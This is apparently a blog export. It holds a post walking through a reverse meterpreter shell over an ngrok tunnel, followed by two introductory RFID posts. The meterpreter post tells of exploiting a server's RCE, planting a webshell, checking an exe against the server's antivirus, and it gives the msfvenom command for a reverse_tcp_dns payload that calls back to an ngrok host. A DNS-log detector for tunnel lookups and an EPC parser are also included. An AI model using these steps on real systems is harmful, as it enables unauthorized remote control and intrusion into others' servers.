Meterpreter over Ngrok (Abyss Zircanavo, 2017-05-01)<br />
<span style="font-size: large;">It's been a very interesting year for me: getting reverse meterpreter connections over SSH tunnels, paranoid mode, bypassing AVs, and even getting a reverse VNC connection via the "VNC DLL injection" method to get a GUI view of a vulnerable server with no access to RDP. It's good to have a VPS just for this purpose, but there are times when I don't want to authenticate to my VPS and set up a teamserver to connect my Armitage to the VPS; people tend to get lazy about doing things like this repeatedly. Hackers especially.</span><br />
<span style="font-size: large;"><br /></span>
<span style="font-size: large;">If I'm using Metasploit locally on my own system, I can't always set up a reverse connection from behind NAT.</span><br />
<span style="font-size: large;"><br /></span>
<span style="font-size: large;">Now here's the Current Situation!</span><br />
<span style="font-size: large;"><br /></span>
<ul>
<li><span style="font-size: large;">I found a server vulnerable to Remote RCE.</span></li>
<li><span style="font-size: large;">Uploaded a webshell to gather some info.</span></li>
<li><span style="font-size: large;">Uploaded an exe after carefully testing it against the AV installed over the server.</span></li>
<li><span style="font-size: large;">Booted up metasploit.</span></li>
<li><span style="font-size: large;">Tried to exploit it to get a bind shell, but unfortunately the bind shell is not working (firewall, as always).</span></li>
<li><span style="font-size: large;">Let's do a Reverse then ;)</span></li>
<li><span style="font-size: large;">But there's another problem :(</span></li>
<li><span style="font-size: large;">I'm sitting in the office and sadly I don't have the router login credentials for setting up port forwarding :(</span></li>
</ul>
<span style="font-size: large;"><br /></span>
<span style="font-size: large;"><br /></span>
<span style="font-size: large;">Now what to do?</span><br />
<span style="font-size: large;">Here comes Ngrok to the rescue. :D</span><br />
<span style="font-size: large;"><br /></span>
<span style="font-size: large;">What's Ngrok?</span><br />
<span style="font-size: large;">"secure introspected tunnels to localhost" & "Expose local servers behind NATs and firewalls to the public internet over secure tunnels." - direct from their <a href="https://ngrok.com/">website</a></span><br />
<span style="font-size: large;"><br /></span>
<span style="font-size: large;"><br /></span>
<span style="font-size: large;">Setting up Ngrok</span><br />
<span style="font-size: large;"><br /></span>
<span style="font-size: large;">1. Register with ngrok. (It doesn't verify the email id, though.)</span><br />
<span style="font-size: large;">2. Once you're logged in, just follow the instructions. You'll get a screen like this.</span><br />
<span style="font-size: large;"><br /></span>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://1.bp.blogspot.com/-YDu2fYlTPLA/WQcMsQsgxPI/AAAAAAAAJis/pAK26pIWOM0flMFg9dhILj-ODam6v__YACLcB/s1600/1.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><span style="font-size: large;"><img border="0" height="455" src="https://1.bp.blogspot.com/-YDu2fYlTPLA/WQcMsQsgxPI/AAAAAAAAJis/pAK26pIWOM0flMFg9dhILj-ODam6v__YACLcB/s640/1.png" width="640" /></span></a></div>
<span style="font-size: large;"><br /></span>
<span style="font-size: large;"><br /></span>
<span style="font-size: large;">3. Once the setup is done, run the following command so that ngrok listens for TCP connections on a random public port and forwards them to our system behind NAT.</span><br />
<span style="font-size: large;"><br /></span>
<blockquote class="tr_bq">
<span style="color: orange; font-size: large;">./ngrok tcp 80</span></blockquote>
<span style="font-size: large;"><br /></span>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://2.bp.blogspot.com/-VIoa_7NIe2I/WQcM0s69ppI/AAAAAAAAJiw/ZHp9Yk-szng2PQ6-U0YjGUvUnndiZzH_wCLcB/s1600/2.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><span style="font-size: large;"><img border="0" height="342" src="https://2.bp.blogspot.com/-VIoa_7NIe2I/WQcM0s69ppI/AAAAAAAAJiw/ZHp9Yk-szng2PQ6-U0YjGUvUnndiZzH_wCLcB/s640/2.png" width="640" /></span></a></div>
<span style="font-size: large;"><br /></span>
<span style="font-size: large;"><br /></span>
<span style="font-size: large;">4. Generate a meterpreter exe with the ngrok settings and set up a handler to accept the reverse meterpreter connection.</span><br />
<span style="font-size: large;"><br /></span>
<blockquote class="tr_bq">
<span style="color: orange; font-size: large;">msfvenom -p windows/meterpreter/reverse_tcp_dns lport=12791 lhost=<ngrok domain> -f exe -o test.exe</span></blockquote>
<span style="font-size: large;"><br /></span>
<span style="font-size: large;">The above command will generate a simple exe with a meterpreter stub. NOTE: I'm NOT sharing the techniques for bypassing AVs. Also, please do not upload your exe to any online scanner (if custom made); that's a very stupid thing to do. Better to use <a href="https://github.com/mubix/vt-notify">vt-notify</a> by @Mubix. A great tool!</span><br />
<span style="font-size: large;"><br /></span>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://2.bp.blogspot.com/-XbXtIj_KLYU/WQcOAE1sIkI/AAAAAAAAJi8/mbMUjF3gNf0UF_7ITrrMGVyN-amg5vWZQCLcB/s1600/3.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><span style="font-size: large;"><img border="0" height="224" src="https://2.bp.blogspot.com/-XbXtIj_KLYU/WQcOAE1sIkI/AAAAAAAAJi8/mbMUjF3gNf0UF_7ITrrMGVyN-amg5vWZQCLcB/s640/3.png" width="640" /></span></a></div>
<div class="separator" style="clear: both; text-align: center;">
<span style="font-size: large;"><br /></span></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://4.bp.blogspot.com/-rbf2zZb3o_8/WQcOPZgZ88I/AAAAAAAAJjA/WlhTSd8jezoMHrSXEWTERTZ1r1ZQ2R4VgCLcB/s1600/4.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><span style="font-size: large;"><img border="0" height="136" src="https://4.bp.blogspot.com/-rbf2zZb3o_8/WQcOPZgZ88I/AAAAAAAAJjA/WlhTSd8jezoMHrSXEWTERTZ1r1ZQ2R4VgCLcB/s640/4.png" width="640" /></span></a></div>
<div class="separator" style="clear: both; text-align: center;">
<span style="font-size: large;"><br /></span></div>
<span style="font-size: large;"><br /></span>
<span style="font-size: large;"><br /></span>
<span style="font-size: large;">5. Now execute the exe and you'll see the words that'll make you go crazy - "Sending Stage bytes" ;)</span><br />
<span style="font-size: large;"><br /></span>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://2.bp.blogspot.com/-lt6852Ixs-0/WQcNO7MFZ4I/AAAAAAAAJi0/nN3vmJxF3PoaJwH5Nv2R1UUKpzzusp_ggCLcB/s1600/3.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><span style="font-size: large;"><img border="0" height="94" src="https://2.bp.blogspot.com/-lt6852Ixs-0/WQcNO7MFZ4I/AAAAAAAAJi0/nN3vmJxF3PoaJwH5Nv2R1UUKpzzusp_ggCLcB/s640/3.png" width="640" /></span></a></div>
<span style="font-size: large;"><br /></span>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://4.bp.blogspot.com/-rrg2Y3veXYE/WQcOvjIsviI/AAAAAAAAJjI/HEEdifKXD18sbumAmDXZTqietP_dS_JaACLcB/s1600/6.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><span style="font-size: large;"><img border="0" height="306" src="https://4.bp.blogspot.com/-rrg2Y3veXYE/WQcOvjIsviI/AAAAAAAAJjI/HEEdifKXD18sbumAmDXZTqietP_dS_JaACLcB/s640/6.png" width="640" /></span></a></div>
<span style="font-size: large;"><br /></span>
<span style="font-size: large;"><br /></span>
<span style="font-size: large;">Now where did "127.0.0.1" come from? o_O</span><br />
<span style="font-size: large;"><br /></span>
<span style="font-size: large;">Ngrok is forwarding the connection to our local system so obviously, it will show "127.0.0.1" to us. When the handler receives the stager and starts sending the stage to the server, it goes through our localhost's forwarded port.</span><br />
<span style="font-size: large;"><br /></span>
<span style="font-size: large;">The ngrok dashboard shows you the number of connections you have.</span><br />
<span style="font-size: large;"><br /></span>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://1.bp.blogspot.com/-DhrdUV0PSYQ/WQcPEBwJ-hI/AAAAAAAAJjM/AP8x3ttAk6woaAdVufH9DJwl0ZMOOg50gCLcB/s1600/7.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><span style="font-size: large;"><img border="0" height="420" src="https://1.bp.blogspot.com/-DhrdUV0PSYQ/WQcPEBwJ-hI/AAAAAAAAJjM/AP8x3ttAk6woaAdVufH9DJwl0ZMOOg50gCLcB/s640/7.png" width="640" /></span></a></div>
<span style="font-size: large;"><br /></span>
<span style="font-size: large;"><br /></span>
<span style="font-size: large;">6. A drawback of this method: you can't get multiple meterpreter sessions over a single port. For multiple sessions you have to repeat all the steps with a different port.</span><br />
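From the defender's side, the trail this setup leaves is a server resolving a tunnel-service hostname (the reverse_tcp_dns stager has to look up the ngrok domain before it can connect out). Added example, not code from the post or from ngrok: scanning constructed resolver log lines for such lookups coming from server address ranges; the log line format, the server ranges and the suffix list are all assumptions to adapt to your own environment.

```python
"""Flag DNS lookups for tunnelling-service hostnames in constructed resolver logs.
Added example: not code from the post or from ngrok. Log format, server ranges and
the suffix list are assumptions; adapt them to your resolver and your environment."""

import re
from collections import defaultdict

# Assumed domain suffixes used by public tunnel services; extend for your environment.
TUNNEL_SUFFIXES = (".ngrok.io", ".ngrok-free.app", ".ngrok.app")

# Assumed log line shape: "<timestamp> <client_ip> query <name>"
LINE_RE = re.compile(
    r"^(?P<ts>\S+) (?P<client>\d{1,3}(?:\.\d{1,3}){3}) query (?P<name>\S+)$"
)


def is_tunnel_host(name: str) -> bool:
    """True when the queried name (with or without trailing dot) belongs to a tunnel service."""
    name = name.rstrip(".").lower()
    return any(name == s[1:] or name.endswith(s) for s in TUNNEL_SUFFIXES)


def find_tunnel_lookups(lines, server_nets=("10.0.",)):
    """Return {client_ip: [names...]} for hosts in server_nets that resolved tunnel names.

    Workstations may legitimately use ngrok during development; a server that
    suddenly resolves a tunnel hostname is the signal worth chasing.
    """
    hits = defaultdict(list)
    for line in lines:
        m = LINE_RE.match(line.strip())
        if not m:
            continue  # unparsable line: skip it rather than fail the whole scan
        client, name = m["client"], m["name"]
        if client.startswith(server_nets) and is_tunnel_host(name):
            hits[client].append(name.rstrip(".").lower())
    return dict(hits)


# Constructed sample log: a web server (10.0.5.20) resolving a tunnel hostname
# among ordinary lookups, plus a workstation (192.168.1.77) doing the same.
SAMPLE_LOG = """\
2017-05-01T16:05:01Z 10.0.5.20 query www.example.com.
2017-05-01T16:05:03Z 10.0.5.20 query 0.tcp.ngrok.io.
2017-05-01T16:05:04Z 192.168.1.77 query 2.tcp.ngrok.io.
2017-05-01T16:05:09Z 10.0.5.21 query updates.example.net.
garbage line that does not match
""".splitlines()

if __name__ == "__main__":
    for host, names in find_tunnel_lookups(SAMPLE_LOG).items():
        print(f"ALERT {host} resolved tunnel host(s): {', '.join(names)}")
```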
<span style="font-size: large;"><br /></span>
<span style="font-size: large;"><br /></span>
<span style="font-size: large;">I Hope this helps.</span><br />
<span style="font-size: large;"><br /></span>
<span style="font-size: large;">Thanks & Cheers!!</span><br />
<span style="font-size: large;"><br /></span>
<span style="font-size: large;"><br /></span>
<span style="font-size: large;"><br /></span>
<span style="font-size: large;"><br /></span>
Introduction to RFID Technology (part 2) (Abyss Zircanavo, 2015-05-13)
<div style="text-align: center;">
NOTE: If you haven't read <a href="https://zircanavo-abyss.blogspot.in/2015/05/introduction-to-rfid-technology-part-1.html"><span style="color: yellow;">part 1</span></a>, then please do so first.</div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://4.bp.blogspot.com/-drnwONaczXE/VVMGkjcpJNI/AAAAAAAACSs/GNAxzPka-P8/s1600/2015-05-13%2B13_27_09-cdn.intechopen.com_pdfs-wm_16518.pdf.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="112" src="https://4.bp.blogspot.com/-drnwONaczXE/VVMGkjcpJNI/AAAAAAAACSs/GNAxzPka-P8/s640/2015-05-13%2B13_27_09-cdn.intechopen.com_pdfs-wm_16518.pdf.png" width="640" /></a></div>
<div style="text-align: center;">
<br /></div>
<div style="text-align: center;">
<br /></div>
<div style="text-align: center;">
<br /></div>
<br />
<div style="text-align: center;">
<span style="font-size: x-large;">Types of RFID Tags</span></div>
<div style="text-align: center;">
<br /></div>
<div style="text-align: center;">
<br /></div>
<div style="text-align: center;">
<span style="font-size: large;">Active Tags</span></div>
<br />
<div style="text-align: center;">
<br /></div>
<div style="text-align: center;">
In active RFID systems, tags have their own transmitter and power source. Usually, the power source is a battery. Active tags broadcast their own signal to transmit the information stored on their microchips.</div>
<div style="text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="http://1.bp.blogspot.com/-c3v75KY2YNY/VVMGmowZZ7I/AAAAAAAACS0/2gDu-gYC0qI/s1600/active_tag.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="186" src="https://1.bp.blogspot.com/-c3v75KY2YNY/VVMGmowZZ7I/AAAAAAAACS0/2gDu-gYC0qI/s640/active_tag.png" width="640" /></a></div>
<div style="text-align: center;">
<span class="Apple-tab-span" style="white-space: pre;"> </span></div>
<div style="text-align: center;">
Active RFID systems typically operate in the ultra-high frequency (UHF) band and offer a range of up to 100 m. In general, active tags are used on large objects, such as rail cars, big reusable containers, and other assets that need to be tracked over long distances.</div>
<div style="text-align: center;">
<br /></div>
<div style="text-align: center;">
<span class="Apple-tab-span" style="white-space: pre;"> </span>There are two main types of active tags:<b> transponders</b> and <b>beacons</b>. </div>
<div style="text-align: center;">
<br /></div>
<div style="text-align: center;">
<b>Transponders</b> are “woken up” when they receive a radio signal from a reader, and then power on and respond by transmitting a signal back. Because transponders do not actively radiate radio waves until they receive a reader signal, they conserve battery life.</div>
<div style="text-align: center;">
<br /></div>
<div style="text-align: center;">
<span class="Apple-tab-span" style="white-space: pre;"> </span><b>Beacons</b> are used in most real-time locating systems (RTLS), in order to track the precise location of an asset continuously. Unlike transponders, beacons are not powered on by the reader’s signal. Instead, they emit signals at pre-set intervals. Depending on the level of locating accuracy required, beacons can be set to emit signals every few seconds, or once a day. Each beacon’s signal is received by reader antennas that are positioned around the perimeter of the area being monitored, and communicates the tag’s ID information and position.</div>
<div style="text-align: center;">
<span class="Apple-tab-span" style="white-space: pre;"> </span></div>
<div style="text-align: justify;">
<span class="Apple-tab-span" style="white-space: pre;"> </span><b><i>Tag Power Source</i></b> : Internal to tag</div>
<div style="text-align: justify;">
<span class="Apple-tab-span" style="white-space: pre;"> </span><b><i>Tag Battery</i></b> : Yes</div>
<div style="text-align: justify;">
<span class="Apple-tab-span" style="white-space: pre;"> </span><b><i>Availability of Tag Power</i></b> : Continuous</div>
<div style="text-align: justify;">
<span class="Apple-tab-span" style="white-space: pre;"> </span><b><i>Required Signal Strength from Reader to Tag</i></b> : Very Low</div>
<div style="text-align: justify;">
<span class="Apple-tab-span" style="white-space: pre;"> </span><b><i>Available Signal Strength from Tag to Reader</i></b> : High</div>
<div style="text-align: justify;">
<span class="Apple-tab-span" style="white-space: pre;"> </span><b><i>Communication Range</i></b> : Long Range (100m or more) </div>
<div style="text-align: justify;">
<span class="Apple-tab-span" style="white-space: pre;"> </span><b><i>Sensor Capability</i></b> : Ability to continuously monitor and record sensor input.</div>
<div style="text-align: center;">
<br /></div>
<div style="text-align: center;">
<br /></div>
<div style="text-align: center;">
<span style="font-size: large;">Passive Tags</span></div>
<div style="text-align: center;">
<br /></div>
<div style="text-align: center;">
In passive RFID systems, the reader and reader antenna send a radio signal to the tag. The RFID tag then uses the transmitted signal to power on, and reflect energy back to the reader. This is called <b>Backscatter Modulation.</b></div>
<div style="text-align: center;">
<br /></div>
<div style="text-align: center;">
<span class="Apple-tab-span" style="white-space: pre;"> </span>Passive RFID systems can operate in the low frequency (LF), high frequency (HF) or ultra-high frequency (UHF) radio bands. </div>
<div style="text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="http://1.bp.blogspot.com/-mMxlhy0BugU/VVMJpJYjajI/AAAAAAAACTQ/_TkG291Jcgg/s1600/Backscatter_diagram_large_v2.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="418" src="https://1.bp.blogspot.com/-mMxlhy0BugU/VVMJpJYjajI/AAAAAAAACTQ/_TkG291Jcgg/s640/Backscatter_diagram_large_v2.jpg" width="640" /></a></div>
<div style="text-align: center;">
<br /></div>
<div style="text-align: center;">
As passive system ranges are limited by the power of the tag’s backscatter (the radio signal reflected from the tag back to the reader), they are typically less than 10 m. Because passive tags do not require a power source or transmitter, and only require a tag chip and antenna, they are cheaper, smaller, and easier to manufacture than active tags.</div>
<div style="text-align: center;">
<br /></div>
<div style="text-align: center;">
<br /></div>
<div style="text-align: center;">
<span class="Apple-tab-span" style="white-space: pre;"> </span>Passive tags can be packaged in many different ways, depending on the specific RFID application requirements. For instance, they may be mounted on a substrate, or sandwiched between an adhesive layer and a paper label to create smart RFID labels. Passive tags may also be embedded in a variety of devices or packages to make the tag resistant to extreme temperatures or harsh chemicals.</div>
<div style="text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="http://2.bp.blogspot.com/-vGIq4q-Vxmo/VVMGpj6mhSI/AAAAAAAACS8/FrpZkyISxA4/s1600/passive_tag.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="228" src="https://2.bp.blogspot.com/-vGIq4q-Vxmo/VVMGpj6mhSI/AAAAAAAACS8/FrpZkyISxA4/s640/passive_tag.png" width="640" /></a></div>
<div style="text-align: center;">
<br /></div>
<div style="text-align: center;">
<span class="Apple-tab-span" style="white-space: pre;"> </span>Passive RFID solutions are useful for many applications, and are commonly deployed to track goods in the supply chain, to inventory assets in the retail industry, to authenticate products such as pharmaceuticals, and to embed RFID capability in a variety of devices. Passive RFID can even be used in warehouses and distribution centers, in spite of its shorter range, by setting up readers at choke points to monitor asset movement.</div>
<div style="text-align: center;">
<span class="Apple-tab-span" style="white-space: pre;"> </span></div>
<div style="text-align: justify;">
<span class="Apple-tab-span" style="white-space: pre;"> </span><b><i>Tag Power Source</i></b> : Energy transfer from the reader via RF</div>
<div style="text-align: justify;">
<span class="Apple-tab-span" style="white-space: pre;"> </span><b><i>Tag Battery</i></b> : No</div>
<div style="text-align: justify;">
<span class="Apple-tab-span" style="white-space: pre;"> </span><b><i>Availability of Tag Power</i></b> : Only within field of reader</div>
<div style="text-align: justify;">
<span class="Apple-tab-span" style="white-space: pre;"> </span><b><i>Required Signal Strength from Reader to Tag</i></b> : Very high (must power the tag)</div>
<div style="text-align: justify;">
<span class="Apple-tab-span" style="white-space: pre;"> </span><b><i>Available Signal Strength from Tag to Reader</i></b> : Very Low</div>
<div style="text-align: justify;">
<span class="Apple-tab-span" style="white-space: pre;"> </span><b><i>Communication Range</i></b> : Short range (up to 10m) </div>
<div style="text-align: justify;">
<span class="Apple-tab-span" style="white-space: pre;"> </span><b><i>Sensor Capability</i></b> : Ability to read and transfer sensor values only when tag is powered by reader</div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: center;">
<br /></div>
<div style="text-align: center;">
<span style="font-size: large;">Semi-Passive / Battery Assisted Passive (BAP) Tags</span></div>
<div style="text-align: center;">
<br /></div>
<div style="text-align: center;">
A Battery-Assisted Passive RFID tag is a type of passive tag which incorporates a crucial active tag feature. While most passive RFID tags use the energy from the RFID reader’s signal to power on the tag’s chip and backscatter to the reader, BAP tags use an integrated power source (usually a battery) to power on the chip, so all of the captured energy from the reader can be used for backscatter. </div>
<div style="text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="http://2.bp.blogspot.com/-L5plZEJwO5s/VVMGp3JEJZI/AAAAAAAACTA/piIps4ucPEc/s1600/semi-passive_tag.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="176" src="https://2.bp.blogspot.com/-L5plZEJwO5s/VVMGp3JEJZI/AAAAAAAACTA/piIps4ucPEc/s640/semi-passive_tag.png" width="640" /></a></div>
<div style="text-align: center;">
<br /></div>
<div style="text-align: center;">
Unlike transponders, BAP tags do not have their own transmitters.</div>
<div style="text-align: center;">
<br /></div>
<div style="text-align: justify;">
<span class="Apple-tab-span" style="white-space: pre;"> </span><b><i>Tag Power Source</i></b> : Tag uses internal power source to power on, and energy transferred from the reader via RF to backscatter</div>
<div style="text-align: justify;">
<span class="Apple-tab-span" style="white-space: pre;"> </span><b><i>Tag Battery</i></b> : Yes</div>
<div style="text-align: justify;">
<span class="Apple-tab-span" style="white-space: pre;"> </span><b><i>Availability of Tag Power</i></b> : Only within field of reader</div>
<div style="text-align: justify;">
<span class="Apple-tab-span" style="white-space: pre;"> </span><b><i>Required Signal Strength from Reader to Tag</i></b> : Moderate (does not need to power tag, but must power backscatter)</div>
<div style="text-align: justify;">
<span class="Apple-tab-span" style="white-space: pre;"> </span><b><i>Available Signal Strength from Tag to Reader </i></b>: Moderate</div>
<div style="text-align: justify;">
<span class="Apple-tab-span" style="white-space: pre;"> </span><b><i>Communication Range</i></b> : Moderate range (up to 100m) </div>
<div style="text-align: justify;">
<span class="Apple-tab-span" style="white-space: pre;"> </span><b><i>Sensor Capability</i></b> : Ability to read and transfer sensor values only when tag receives RF signal from reader</div>
<div style="text-align: center;">
<br /></div>
<div style="text-align: center;">
<br /></div>
<div style="text-align: center;">
<span style="font-size: large;">Other RFID tags (active/passive/BAP)</span></div>
<div style="text-align: center;">
<span style="font-size: large;"><br /></span></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="http://2.bp.blogspot.com/-pXto4QM1T40/VVMLZbC_8ZI/AAAAAAAACTc/64xOZCxFS-Q/s1600/rfid-tags-for-solar-module-india.JPG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="482" src="https://2.bp.blogspot.com/-pXto4QM1T40/VVMLZbC_8ZI/AAAAAAAACTc/64xOZCxFS-Q/s640/rfid-tags-for-solar-module-india.JPG" width="640" /></a></div>
<div style="text-align: center;">
<br /></div>
<div style="text-align: center;">
<br /></div>
<div style="text-align: center;">
References: (in part 3)</div>
Introduction to RFID Technology (Part 1) (Abyss Zircanavo, 2015-05-12)<div class="separator" style="clear: both; text-align: center;">
<a href="http://1.bp.blogspot.com/-vwYohOh5Sec/VVGW1nKIFrI/AAAAAAAACRc/czjWR3-qXz4/s1600/rfid.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="505" src="http://1.bp.blogspot.com/-vwYohOh5Sec/VVGW1nKIFrI/AAAAAAAACRc/czjWR3-qXz4/s640/rfid.jpg" width="640" /></a></div>
<div style="text-align: center;">
<span style="font-size: x-large;"><br /></span></div>
<div style="text-align: center;">
<span style="font-size: x-large;"><br /></span></div>
<div style="text-align: center;">
<span style="font-size: x-large;"><br /></span></div>
<div style="text-align: center;">
<span style="font-size: x-large;">What is RFID?</span></div>
<div style="text-align: center;">
<br /></div>
<div style="text-align: justify;">
RFID, short for Radio Frequency IDentification, is a technology that enables identification of a tag (normally attached to an entity) by using electromagnetic waves. The function served by RFID is similar to bar code identification, but RFID does not require a line of sight to operate.</div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: center;">
<br /></div>
<div style="text-align: center;">
<span style="font-size: x-large;">RFID components</span></div>
<div style="text-align: center;">
<br /></div>
<div style="text-align: center;">
<span style="font-size: large;">Tag</span></div>
<div style="text-align: center;">
<span class="Apple-tab-span" style="white-space: pre;"> </span>Tag chips or integrated circuits (ICs)</div>
<div style="text-align: center;">
<span class="Apple-tab-span" style="white-space: pre;"> </span>Tag antennas</div>
<div style="text-align: center;">
<br /></div>
<div style="text-align: center;">
<span style="font-size: large;">Reader</span></div>
<div style="text-align: center;">
<span class="Apple-tab-span" style="white-space: pre;"> </span>Reader antenna</div>
<div style="text-align: center;">
<span class="Apple-tab-span" style="white-space: pre;"> </span>Reader control & application software</div>
<div style="text-align: center;">
<br /></div>
<div style="text-align: center;">
<br /></div>
<div style="text-align: center;">
<span style="font-size: x-large;">RFID Tags</span></div>
<div style="text-align: center;">
<span class="Apple-tab-span" style="white-space: pre;"> </span></div>
<div style="text-align: justify;">
<a href="http://2.bp.blogspot.com/-_jzgEfeTsZg/VVGZ_3liAFI/AAAAAAAACR8/7JMVz8-6ck0/s1600/rfidlabel2.jpg" imageanchor="1" style="clear: right; float: right; margin-bottom: 1em; margin-left: 1em;"><img border="0" src="http://2.bp.blogspot.com/-_jzgEfeTsZg/VVGZ_3liAFI/AAAAAAAACR8/7JMVz8-6ck0/s1600/rfidlabel2.jpg" /></a>An RFID tag is composed of an integrated circuit (called an IC or chip) attached to an antenna that has been printed, etched, stamped or vapor-deposited onto a mount, which is often a paper substrate or polyethylene terephthalate (PET). The chip and antenna combination, called an inlay, is then converted, i.e. sandwiched between a printed label and its adhesive backing, or inserted into a more durable structure.</div>
<div style="text-align: center;">
<span class="Apple-tab-span" style="white-space: pre;"> </span></div>
<div style="text-align: center;">
<span class="Apple-tab-span" style="white-space: pre;"> </span><span style="font-size: large;">Tag Chip</span></div>
<div style="text-align: justify;">
<span class="Apple-tab-span" style="white-space: pre;"> </span>The tag's chip or integrated circuit (IC) delivers performance, memory and extended features to the tag. The chip is pre-programmed with a tag identifier (TID), a unique serial number assigned by the chip manufacturer, and includes a memory bank to store the item's unique tracking identifier (called an electronic product code or EPC).</div>
<div style="text-align: justify;">
<span class="Apple-tab-span" style="white-space: pre;"> </span></div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: center;">
<span class="Apple-tab-span" style="white-space: pre;"> </span><span style="font-size: large;">Electronic Product Code (EPC)</span></div>
<div style="text-align: justify;">
<span class="Apple-tab-span" style="white-space: pre;"> </span>The electronic product code (EPC) stored in the tag chip's memory is written to the tag by an RFID printer and takes the form of a 96-bit string of data. The first eight bits are a header which identifies the version of the protocol. The next 28 bits identify the organization that manages the data for this tag; the organization number is assigned by the EPCglobal consortium. The next 24 bits are an object class, identifying the kind of product; the last 36 bits are a unique serial number for a particular tag. These last two fields are set by the organization that issued the tag. The total electronic product code number can be used as a key into a global database to uniquely identify that particular product.</div>
<div class="separator" style="clear: both; text-align: center;">
<a href="http://1.bp.blogspot.com/-X_n76ejBwTk/VVGYz8W6MBI/AAAAAAAACRw/svWkjzWRT40/s1600/epc-rfid.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="180" src="http://1.bp.blogspot.com/-X_n76ejBwTk/VVGYz8W6MBI/AAAAAAAACRw/svWkjzWRT40/s640/epc-rfid.png" width="640" /></a></div>
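The 96-bit layout just described (8-bit header, 28-bit manager number, 24-bit object class, 36-bit serial), as an added example that is not part of the original post: a small Python parser and builder that splits a hex EPC into those four fields and range-checks each field when packing it back. The sample EPC value is constructed, not taken from a real tag.

```python
"""Parse and build a 96-bit EPC using the field layout described in the text
(8-bit header, 28-bit manager number, 24-bit object class, 36-bit serial).
Added example, not code from the original post."""

from dataclasses import dataclass

# Field widths in bits, most significant field first, as given in the text.
EPC_FIELDS = (("header", 8), ("manager", 28), ("object_class", 24), ("serial", 36))
EPC_BITS = sum(width for _, width in EPC_FIELDS)  # 96


@dataclass(frozen=True)
class Epc:
    header: int
    manager: int
    object_class: int
    serial: int


def parse_epc(hex_epc: str) -> Epc:
    """Split a 24-hex-digit (96-bit) EPC into its four fields."""
    digits = hex_epc.strip().replace(" ", "").lower()
    if len(digits) != EPC_BITS // 4:
        raise ValueError(
            f"EPC must be {EPC_BITS} bits ({EPC_BITS // 4} hex digits), got {len(digits)}"
        )
    value = int(digits, 16)  # raises ValueError on non-hex input
    fields = {}
    remaining = EPC_BITS
    for name, width in EPC_FIELDS:
        # Peel fields off from the most significant end.
        remaining -= width
        fields[name] = (value >> remaining) & ((1 << width) - 1)
    return Epc(**fields)


def build_epc(epc: Epc) -> str:
    """Pack the four fields back into a 24-hex-digit EPC, checking each fits its width."""
    value = 0
    for name, width in EPC_FIELDS:
        field = getattr(epc, name)
        if not 0 <= field < (1 << width):
            raise ValueError(f"{name}={field} does not fit in {width} bits")
        value = (value << width) | field
    return f"{value:0{EPC_BITS // 4}x}"


if __name__ == "__main__":
    # Constructed sample: header 0x35, manager 0x123456, object class 0xabcd, serial 0x42.
    # Field widths are multiples of 4 bits, so each field is a whole number of hex digits.
    sample = "35" + "0123456" + "00abcd" + "000000042"  # 2 + 7 + 6 + 9 = 24 hex digits
    parsed = parse_epc(sample)
    print(parsed)
    print(build_epc(parsed) == sample)
```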
<div style="text-align: center;">
<span class="Apple-tab-span" style="white-space: pre;"> </span></div>
<div style="text-align: center;">
<span class="Apple-tab-span" style="white-space: pre;"> </span><span style="font-size: large;">Tag Antennas</span></div>
<div style="text-align: justify;">
<span class="Apple-tab-span" style="white-space: pre;"> </span>Tag antennas collect energy and channel it to the chip to turn it on. Generally, the larger the tag antenna's area, the more energy it will be able to collect and channel toward the tag chip, and the further read range the tag will have.</div>
<div style="text-align: center;">
<br /></div>
<div style="text-align: center;">
<a href="http://2.bp.blogspot.com/-pFLXWWQufuM/VVGXbBYHpYI/AAAAAAAACRk/Um6EGB5FObU/s1600/tag.jpg" imageanchor="1" style="clear: right; float: right; margin-bottom: 1em; margin-left: 1em;"><img border="0" src="http://2.bp.blogspot.com/-pFLXWWQufuM/VVGXbBYHpYI/AAAAAAAACRk/Um6EGB5FObU/s1600/tag.jpg" /></a><span class="Apple-tab-span" style="white-space: pre;"></span></div>
<div style="text-align: justify;">
<span class="Apple-tab-span"> </span>There is no perfect antenna for all applications. It is the application that defines the antenna specifications. Some tags might be optimized for a particular frequency band, while others might be tuned for good performance when attached to materials that may not normally work well for wireless communication (certain liquids and metals, for example). Antennas can be made from a variety of materials; they can be printed, etched, or stamped with conductive ink, or even vapor deposited onto labels.</div>
<br />
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
